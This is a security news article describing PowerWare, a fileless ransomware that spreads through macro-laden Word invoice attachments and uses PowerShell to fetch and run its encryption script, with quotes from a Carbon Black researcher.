A week ago, malware specialists from Carbon Black firm noticed a new threat dubbed PowerWare ransomware which exploits PowerShell, the native Windows framework.
Apparently, the creators of ransomware are adding new features in order to make their malware even more dangerous and effective.
What is really interesting about the PowerWare ransomware is that it is fileless. Actually, lots of malware in the wild appear to be fileless, including one of the variants of the popular Angler Exploit Kit, though this feature is rare for ransomware indeed.
The cyber criminals behind PowerWare are distributing the malware through spam messages, including a Word document attachment, purporting to be an invoice. In addition, the hackers use an old trick to convince victims in enabling the macros – a request to enable macros to correctly view the document.
The macros runs the cmd.exe which launches the PowerShell, which is the native Windows framework that uses a command-line shell to perform several tasks.
It is exactly the use of PowerShell which lets the ransomware avoid writing files to the disk and makes hard the threat detection. Also, it allows the ransomware to encrypt files on the victim’s PC.
“The macros are there to launch PowerShell and pull down the ransomware script. Lots of malware can be distributed via macros in Word docs. Most of the time they download additional binaries to do more bad stuff (backdoors, etc.),” Carbon Black’s Valdez explained.
“This does not pull down any additional binaries (executables), and leverages PowerShell (already on the system and approved to be there) to do the dirty work.”
“This means no ‘traditional’ malware – no additional executable needed – just a text document (script),” he added.
The PowerShell ransomware demands a $500 ransom in order to restore the victim’s encrypted files. Besides, in this case, the ransom doubles if the victim doesn’t respect the deadline.
In fact, fileless ransomware are getting very popular in the criminal society lately. On March 11, the security researchers discovered another fileless malware family, named PowerSniff, which has much in common with PowerWare itself.